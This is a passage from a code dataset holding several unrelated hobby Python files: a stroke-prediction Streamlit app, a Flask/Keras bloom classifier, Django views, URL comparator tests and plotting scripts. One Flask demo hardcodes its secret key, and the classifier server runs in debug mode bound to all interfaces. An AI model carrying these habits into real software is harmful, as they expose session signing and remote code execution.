event_id):\r\n\t\treturn constants.CALENDAR42_API_PARTICIPANTS.format(event_id)\r\n\r\n\tdef extract_data(self, json_data):\r\n\t\treturn [item['subscriber']['first_name'] for item in json_data['data']]\r\n", "sub_path": "apiproxy/events/api_action_caller.py", "file_name": "api_action_caller.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_BASE_URL", "line_number": 31, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 31, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 46, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 52, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 58, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 68, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 76, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT.format", "line_number": 83, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 83, "usage_type": "name"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS.format", "line_number": 98, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS", "line_number": 98, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 98, "usage_type": "name"}]}
+{"seq_id": "290191003", "text": "#from fastapi import FastAPI\r\n#from pydantic import BaseModel\r\nimport pickle\r\nimport streamlit as st\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n'''\r\napp=FastAPI()\r\nclass request_body(BaseModel):\r\n Age:float\r\n Hypertension:str\r\n Heart_disease:str\r\n Average_glucose: float\r\n BMI: float\r\n Marital_status: str\r\n Gender: str\r\n Work_type: str\r\n Residence:str\r\n Smoking_status: str\r\n'''\r\ndf=pd.read_csv(\"stroke_data_Cleaned3.csv\",header=0)\r\nprint(df.head())\r\n\r\n#Creating X and y Variables for Training Testing datasets\r\nX=df.drop([\"stroke\"],axis=1)\r\ny=df[\"stroke\"] #Target Variable\r\n\r\n#Creating Training Testing datasets\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test= train_test_split(X,y, test_size=0.2, random_state=5)\r\n#I have tried using K-best(taking 6 Variables) and the Classification Report doesnot show much Variation thus we are not using K-best\r\n\r\n#Creating Classification Models\r\n#I am using Naive Bayes Classification here, thus Scaling and One Hot Encoding is not Required\r\nmodel=GaussianNB()\r\nmodel.fit(X_train,y_train)\r\ny_pred=model.predict(X_test)\r\n\r\n#Testing effeciency of Naive Bayes Classifier\r\nfrom sklearn.metrics import confusion_matrix, classification_report,recall_score,f1_score\r\ncm=confusion_matrix(y_test, y_pred)\r\nprint(\"Confusion Matrix\")\r\nprint(cm)\r\ncr=classification_report(y_test, y_pred)\r\nprint(\"Classification Report\")\r\nprint(cr)\r\n#Since this dataset is not balanced accuracy is not the measure we will be looking for\r\n# Here we want to reduce the number of False negatives so we will look at Recall and F1 Score\r\nrs=recall_score(y_test,y_pred, average=\"weighted\")\r\nfs=f1_score(y_test,y_pred,average=\"weighted\")\r\nprint(\"Recall Value: \",rs)\r\nprint(\"F1 Score: \",fs)\r\n\r\n#Pickle is used for saving .pkl file\r\n#We are using .pkl file because we are going to deploy the model on Streamlit\r\npickle.dump(model,open('stroke.pkl','wb'))\r\nloaded_model=pickle.load(open('stroke.pkl','rb'))\r\n\r\n#For deploying on the Website\r\ndef predict_input_page():\r\n loaded_model = pickle.load(open('stroke.pkl', 'rb'))\r\n st.title(\"Stroke Prediction Model\")\r\n Age=st.slider(\"Age: \", min_value=0, max_value=90)\r\n Hypertension = st.radio(\"Do you suffer from Hypertension: \",(\"Yes\",\"No\"))\r\n Heart_disease=st.radio(\"Do you suffer from Heart Disease: \",(\"Yes\",\"No\"))\r\n Average_glucose=st.slider(\"Average Glucose Levels: \", min_value=50, max_value=280)\r\n BMI=st.slider(\"BMI: \",min_value=10, max_value=70)\r\n Marrital_status=st.radio(\"Are you married: \",(\"Yes\",\"No\"))\r\n Gender=st.radio(\"What is your Gender: \",(\"Male\",\"Female\"))\r\n Work_type=st.radio(\"What is your Work type?\",(\"Private\",\"Self-employed\",\"children\",\"Govt_job\",\"Never_worked\"))\r\n Residence=st.radio(\"What is your area of Residence\",(\"Urban\",\"Rural\"))\r\n Smoking_status=st.radio(\"Enter your Smoking Status:\",(\"never smoked\",\"Unknown\",\"formerly smoked\",\"smokes\"))\r\n ok=st.button(\"Predict\")\r\n\r\n #Since we are taking the input as a string and the model needs the values in numbers we convert the String to int\r\n if Hypertension==\"Yes\":\r\n Hypertension= 1\r\n elif Hypertension==\"No\":\r\n Hypertension=0\r\n\r\n if Heart_disease==\"Yes\":\r\n Heart_disease= 1\r\n elif Heart_disease==\"No\":\r\n Heart_disease=0\r\n\r\n if Marrital_status==\"Yes\":\r\n Marrital_status=1\r\n elif Marrital_status==\"No\":\r\n Marrital_status=0\r\n\r\n if Gender==\"Male\":\r\n Gender=1\r\n elif Gender==\"Female\":\r\n Gender=0\r\n\r\n if Work_type==\"Govt_job\":\r\n Work_type=0\r\n elif Work_type==\"Never_worked\":\r\n Work_type=1\r\n elif Work_type==\"Private\":\r\n Work_type=2\r\n elif Work_type==\"Self-employed\":\r\n Work_type=3\r\n elif Work_type==\"children\":\r\n Work_type=4\r\n\r\n if Residence==\"Rural\":\r\n Residence=0\r\n elif Residence==\"Urban\":\r\n Residence=1\r\n\r\n if Smoking_status==\"Unknown\":\r\n Smoking_status=0\r\n elif Smoking_status==\"formerly smoked\":\r\n Smoking_status=1\r\n elif Smoking_status==\"never smoked\":\r\n Smoking_status=2\r\n elif Smoking_status==\"smokes\":\r\n Smoking_status=3\r\n\r\n testdata=np.array([[Age, Hypertension, Heart_disease, Average_glucose, BMI, Marrital_status,Gender,Work_type,Residence,Smoking_status]])\r\n classi=loaded_model.predict(testdata)[0]\r\n\r\n try:\r\n if ok==True:\r\n if classi == 0:\r\n st.success(\"Awesome! You are on low risk of getting Stroke\")\r\n elif classi == 1:\r\n st.error(\"Cautious! You are on high risk of getting Stroke\")\r\n except:\r\n st.info(\"Enter some Data\")\r\n\r\n\r\n\r\n\r\n", "sub_path": "ML_Project_2_209027.py", "file_name": "ML_Project_2_209027.py", "file_ext": "py", "file_size_in_byte": 4696, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 52, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 58, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 66, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 71, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 73, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 74, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 133, "usage_type": "call"}]}
+{"seq_id": "59612291", "text": "import flask\nimport os\nimport datetime\nimport sys\n\nimport tensorflow as tf\nfrom flask import json\nfrom keras import models\n\n# initialize our Flask application and the Keras model\nfrom safetoswim.core import PhotoProcessor\nfrom safetoswim.repository import PostgresRepository, SqliteRepository\n\napplication = flask.Flask(__name__)\nmodel = None\ngraph = tf.get_default_graph()\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nUPLOAD_FOLDER = 'images'\napplication.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ndef load_model():\n global model\n file_dir = os.path.abspath(os.path.dirname(__file__))\n #model = ResNet50(weights=\"imagenet\")\n model_path = os.path.join(file_dir, 'models', 'hab_KerasBinaryClassifier_model.h5')\n print(f'Loading model from: {model_path}')\n model = models.load_model(model_path)\n if model is None:\n raise TypeError(f'Failed to load model from file {model_path}')\n\ndef get_model():\n global modele\n if model is None:\n load_model()\n return model\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef save_image(submitter, image_location, date, time, name='', location='', latitude=0.0, longitude=0.0):\n repo = SqliteRepository('test.sqlite')\n id = repo.add_sample(submitter, image_location, date, time, name, location, latitude, longitude)\n return id\n\n@application.route(\"/\", methods=['GET'])\ndef index():\n return '''\n Safe To Swim\n Welcome to SafeToSwim!'''\n\n@application.route(\"/predict\", methods=['GET', 'POST'])\ndef predict():\n # initialize the data dictionary that will be returned from the\n # view\n data = {\"success\": False}\n\n # ensure an image was properly uploaded to our endpoint\n if flask.request.method == \"POST\":\n if flask.request.files.get(\"image\"):\n # read the image in PIL format\n image = flask.request.files[\"image\"].read()\n photo_processor = PhotoProcessor(image)\n location = 'OakLedge'\n submitter = 'admin@safetoswim.org'\n longitude = 0.0\n # photo_processor.exif['DateTime']\n # photo_processor.exif['DateTimeOriginal']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n if 'DateTime' in photo_processor.exif_data:\n date = datetime.datetime.strptime(photo_processor.exif_data['DateTime'], '%Y:%m:%d %H:%M:%S')\n else:\n date = datetime.datetime.now()\n time = date.time()\n date = date.date()\n #date, time, name='', location='', latitude=0.0, longitude=0.0\n save_image(submitter, 'images/one.jpg', str(date), str(time), 'New Sample', location,\n photo_processor.latitude, photo_processor.longitude)\n\n # preprocess the image and prepare it for classification\n rgb_data = photo_processor.prepare_rgb_data(img_size=(128, 128))\n\n # classify the input image and then initialize the list\n # of predictions to return to the client\n # classify the input image and then initialize the list\n # of predictions to return to the client\n preds = None\n model = get_model()\n with graph.as_default():\n preds = model.predict(rgb_data)\n if preds[0][0] >= 0.5:\n data[\"prediction\"] = 'bloom'\n else:\n data[\"prediction\"] = 'not-bloom'\n\n #data['exif'] = photo_processor.exif\n\n # loop over the results and add them to the list of\n # returned predictions\n '''\n for (imagenetID, label, prob) in results[0]:\n r = {\"label\": label, \"probability\": float(prob)}\n data[\"predictions\"].append(r)\n '''\n\n # indicate that the request was a success\n data[\"success\"] = True\n\n # return the data dictionary as a JSON response\n response = flask.jsonify(data)\n return response\n else:\n pass\n else:\n return '''\n \n Upload new File\n Upload new File\n \n %s \n ''' % \" \".join(os.listdir(application.config['UPLOAD_FOLDER'], ))\n\n\nif __name__ == \"__main__\":\n print((\"* Loading Keras model and Flask starting server...\"\n \"please wait until server has fully started\"))\n load_model()\n application.run(host=\"0.0.0.0\", debug=True)\n\n", "sub_path": "safetoswim/servers/flask_server.py", "file_name": "flask_server.py", "file_ext": "py", "file_size_in_byte": 4954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "keras.models.load_model", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 28, "usage_type": "name"}, {"api_name": "safetoswim.repository.SqliteRepository", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request.files.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "attribute"}, {"api_name": "safetoswim.core.PhotoProcessor", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 118, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "415168496", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views.generic import View, TemplateView, CreateView, UpdateView, FormView, ListView\nfrom django.views import generic\nfrom django.conf import settings \nfrom django.shortcuts import render\n\n# Create your views here.\n\nclass Sell_In_OutView(TemplateView):\n template_name = 'sell-inXsell-out.html'\nsell = Sell_In_OutView.as_view() \n\n\nclass VendasDiariasView(TemplateView):\n template_name = 'vendas_diarias.html'\nvendas_diarias = VendasDiariasView.as_view() \n\n\nclass NielsenView(TemplateView):\n template_name = 'nielsen.html'\nnielsen = NielsenView.as_view()\n\n\nclass CloseUpView(TemplateView):\n template_name = 'close-up.html'\ncloseup = CloseUpView.as_view()", "sub_path": "PowerBiNestle/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "132611014", "text": "from flask import Flask\nfrom flask import render_template, request, session, url_for, redirect\n\napp = Flask(__name__)\napp.secret_key = 'whoknowsthissecretw'\n\n@app.route('/')\ndef index():\n return render_template('index2.html')\n \n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/login', methods=['POST'])\ndef login():\n user = request.form['user']\n session['user'] = user\n return render_template('welcome.html', user_name=user)\n\n@app.route('/logout')\ndef logout():\n del session['user']\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "FlaskEx1/src/ex2_v1.py", "file_name": "ex2_v1.py", "file_ext": "py", "file_size_in_byte": 631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "420167610", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom csv import reader\r\n\r\nx = []\r\ny = []\r\nvalues = []\r\nmax_values = []\r\n\r\n# HÄMTA DATA\r\nwith open('rawdata119870.csv', 'r') as csvfile:\r\n data = list(reader(csvfile))\r\n\r\nfor row in data:\r\n values.append({'x': float(row[0]), 'y': float(row[2])})\r\n\r\n# RÄKNA UT MEDLET\r\nindex = 0\r\nlenSample = 27\r\n\r\nwhile index < len(values):\r\n n = 0\r\n xv = 0 \r\n yv = 0\r\n try:\r\n while n < lenSample:\r\n yv += values[index]['y']\r\n xv += values[index]['x']\r\n n += 1\r\n index += 1\r\n\r\n x.append(xv/lenSample)\r\n y.append(yv/lenSample)\r\n except IndexError:\r\n pass\r\n\r\nplt.plot(x, y)\r\nplt.title('graph')\r\nplt.show()", "sub_path": "AI/data analys/uppgift/2c.py", "file_name": "2c.py", "file_ext": "py", "file_size_in_byte": 733, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "270521174", "text": "import threading\nfrom . import Paragraph\nfrom PIL import Image, ImageDraw, ImageEnhance\n\n#process for the thread that creates the first layer\nclass baseThread (threading.Thread):\n def __init__(self, threadID, lock, image, outputFile):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.image = image\n self.lock = lock\n self.outputFile = outputFile\n\n def run(self):\n #print(\"Starting \" + self.name)\n # Get lock to synchronize threads\n self.lock.acquire()\n\n pixels = self.image.load();\n\n for x in range(self.image.size[0]):\n for y in range(self.image.size[1]):\n avg = ( pixels[x,y][0] + pixels[x,y][1] + pixels[x,y][2] )//3\n pixels[x,y] = (avg,avg,avg,255)\n\n\n enhancer = ImageEnhance.Contrast(self.image)\n enhancer.enhance(1.8).save(self.outputFile)\n\n # Free lock to release next thread\n self.lock.release()", "sub_path": "dataportrait/portraitimage/lib/baseLayer.py", "file_name": "baseLayer.py", "file_ext": "py", "file_size_in_byte": 964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 6, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 8, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 8, "usage_type": "attribute"}, {"api_name": "PIL.ImageEnhance.Contrast", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "212088095", "text": "\"\"\"\nTesting UrlComparator\n\nThere are little comments for each testcase because the name\nof each testcase is very descriptive\n\"\"\"\n\nfrom django.test import TestCase\nfrom sectionproject.urlutils.urlcomparator.urlcomparator import UrlComparator\n\nclass ComparatorTest(TestCase):\n # input: wiki example in writeup\n # expected: equal\n def test_wikiExample(self):\n urlA = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n urlB = 'http://en.wikipedia.org/wiki/Unit_testing#Language-'\n \n expected = 0\n res = UrlComparator.compareNormalizeUrl(urlA, urlB)\n \n self.assertEqual(expected, res, 'expected: ' + str(expected) +\\\n ', actual: ' + str(res))\n \n # input: two different url\n # expected: one larger than the other, viceversa for opposite direction \n def test_normalGreaterLesser(self):\n urlA = 'www.google.com'\n urlB = 'www.nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n self.assertTrue(UrlComparator.compareNormalizeUrl(urlB, urlA) > 0)\n \n # input: one url with www., one without\n # expected: correct behavior\n def test_normalizedWWWDotDifferentUrl(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # inputs: url with same query in different order\n # expected equal\n def test_normalizedEqualDifferentQueryUrl(self):\n urlA = 'www.google.com/?q=cse403;id=1'\n urlB = 'www.google.com/?id=1&q=cse403'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) == 0)\n \n # input: url with capital letters in path\n # expected: capital letter should come before \n def test_caseSensitiveCases(self):\n urlA = 'www.google.com/Images'\n urlB = 'www.google.com/images'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # input: two urls\n # expected: order by alphabetical order\n def test_sourcecomparison(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n self.assertTrue(UrlComparator.compareSourceUrl(urlA, urlB) > 0)\n \n # input: a url and two list where one has exactly the same url\n # expected: source unique for one and not source unique for the other\n def test_sourceUnique(self):\n url = 'www.google.com'\n list1 = ['google.com', 'http://google.com']\n list2 = ['www.google.com', 'something.net']\n \n self.assertTrue(UrlComparator.isSourceUnique(url, list1))\n self.assertFalse(UrlComparator.isSourceUnique(url, list2))\n \n # input: a url compared to 1) same url, 2) different but same norm url, 3) entirely\n # different url\n # expected: 1) False, 2) False, 3) True \n def test_normunique(self):\n url = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n # same url\n list1 = ['http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations']\n \n # norm same url\n list2 = ['http://en.wikipedia.org/wiki/Unit_testing#Language-']\n \n # different url\n list3 = ['wikipedia.org']\n \n self.assertFalse(UrlComparator.isNormalizeUnique(url, list1))\n self.assertFalse(UrlComparator.isNormalizeUnique(url, list2))\n self.assertTrue(UrlComparator.isNormalizeUnique(url, list3))\n \n \n \n \n \n \n \n \n ", "sub_path": "sectionproject/urlutils/urlcomparator/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3556, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 19, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 19, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 30, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 30, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 31, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 31, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 39, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 39, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 47, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 47, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 55, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 55, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareSourceUrl", "line_number": 62, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 62, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 71, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 71, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 72, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 72, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 88, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 88, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 89, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 89, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 90, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 90, "usage_type": "name"}]}
+{"seq_id": "447564364", "text": "import cPickle as pickle\nfrom itertools import compress\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nfrom sklearn.decomposition import PCA \nfrom sklearn.manifold import TSNE\n\n\ndef pca(states, labels, n_components, plot_by_colors=False):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('PCA')\n pca = PCA(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = pca.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n color_names = ['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange']\n colors = np.choose(labels, color_names)\n if n_components == 2:\n\n if plot_by_colors:\n fig = plt.figure(1, (4., 4.))\n grid = ImageGrid(fig, 111, # similar to subplot(111)\n nrows_ncols=(3, 4), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes in inch.\n )\n\n for i in range(10):\n\n labels_one = np.array(labels)\n idxs = labels_one == i\n states_one = np.array(list(compress(transformed_states, idxs)))\n labels_one = [color_names[i] for _ in range(len(states_one))]\n grid[i].scatter(states_one[:, 0], states_one[:, 1], c=labels_one)\n\n # plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\ndef tsne(states, labels, n_components):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('T-SNE')\n tsne = TSNE(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = tsne.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n colors = np.choose(labels, ['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange'])\n if n_components == 2:\n plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\nif __name__ == '__main__':\n print('Loading')\n df = pickle.load(open('/home/petrbel/Dropbox/ALI/states.pkl', 'rb'))\n pca(states=list(df['states']), labels=list(df['labels']), n_components=2, plot_by_colors=True)\n # pca(states=list(df['states']), labels=list(df['labels']), n_components=3)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=2)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=3)\n print('Finished')\n", "sub_path": "visual.py", "file_name": "visual.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.decomposition.PCA", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "mpl_toolkits.axes_grid1.ImageGrid", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "itertools.compress", "line_number": 39, "usage_type": "call"}, {"api_name": 